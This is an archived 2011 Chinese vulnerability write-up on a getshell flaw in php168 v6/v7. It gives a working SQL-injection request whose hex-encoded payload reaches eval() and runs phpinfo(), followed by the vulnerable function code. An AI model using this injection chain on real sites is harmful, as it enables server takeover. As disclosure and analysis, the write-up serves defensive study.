当前位置: 代码网 > 服务器>网络安全>漏洞分析 > php168 v6/v7鸡肋Getshell安全问题

php168 v6/v7鸡肋Getshell安全问题

2011年03月11日 漏洞分析 我要评论
php168 v6/v7鸡肋Getshell安全问题  刚搜了一下貌似和以前一个漏洞是一个问题。有点鸡肋,需要条件:  1.网站配置为:文章生成真静态  2.允许注册会员  给出v6的测试代码,提交后执行phpinfo(),v7原理一样... 11-03-11

  刚搜了一下貌似和以前一个漏洞是一个问题。有点鸡肋,需要条件:

  1.网站配置为:文章生成真静态

  2.允许注册会员

  给出v6的测试代码,提交后执行phpinfo(),v7原理一样,只是数据库字段数不一样。

  member/list.php?step=2&type=delete&aiddb[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,15,6,7,8,9,10,1,2,3,4,25,6,7,8,9,10,1,2,3,4,35,6,7,8,9,10,1,2,3,4,45,6,7,8,9,10,1,2,3,4,0x7b247b706870696e666f28297d7d,6,7%23

  0x01 漏洞在make_more_article_html这个函数:

  function make_more_article_html($comebackurl='/',$type='',$aiddb=''){

  global $db,$pre,$webdb,$webdb,$showhtml_type;

  if($webdb[newsmakehtml]!=1||$aiddb=='') // $webdb[newsmakehtml] 真静态

  { return ;}

  ...

  $query = $db->query("select a.*,b.bencandy_html,b.list_html,d.aid from {$pre}article_db d left join {$pre}article a on d.aid=a.aid left join {$pre}sort b on a.fid=b.fid where d.aid in ($string)");

  while($rs = $db->fetch_array($query)){

  ...

  $filename_b=$rs[bencandy_html];

  ...

  eval("\$showurl=\"$filename_b\";");

  ...

  0x02 在 \member\list.php中调用了该漏洞函数:

  if($step==2){

  ...

  if($type=='delete'){

  make_more_article_html("$fromurl","del_0",$aiddb);

  by: k4shifz[w.s.t]

(0)

相关文章:

  • MD5哈希漏洞成为高危Web安全漏洞

    MD5哈希漏洞成为高危Web安全漏洞

    MD5哈希漏洞成为高危Web安全漏洞  信息安全行业的一位首席Web安全专家称,一年多前发现的哈希算法漏洞可能成为Web上最危险的安全漏洞。   在2010 ... [阅读全文]
  • DISCUZ X1.5 本地文件包含漏洞

    DISCUZ X1.5 本地文件包含漏洞

    DISCUZ X1.5 本地文件包含漏洞  DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。  config_global.php ... [阅读全文]
  • DedeCms V5 orderby参数注射漏洞

    DedeCms V5 orderby参数注射漏洞

    DedeCms V5 orderby参数注射漏洞  影响版本:   DedeCms V5漏洞描述:   DedeCms由2004年到现在,已经经历了五个版本,... [阅读全文]
  • 利用%5c绕过验证

    利用%5c绕过验证

    利用%5c绕过验证  说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^... [阅读全文]
  • 分析phpwind2.0.1漏洞

    分析phpwind2.0.1漏洞

    分析phpwind2.0.1漏洞  猫猫传给我一个phpwind2.0.1漏洞利用程序,可以直接在目录中写入一个木马。怎么说呢,这个漏洞是pinkeyes发现... [阅读全文]
  • 动易4.03上传漏洞

    动易4.03上传漏洞

    动易4.03上传漏洞  动易4.03上传漏洞。2005-1-10 就出来了,一直没有公布。  看黑客防线的攻关第3关用的是动易所有公布出来了。  影响版本: ... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com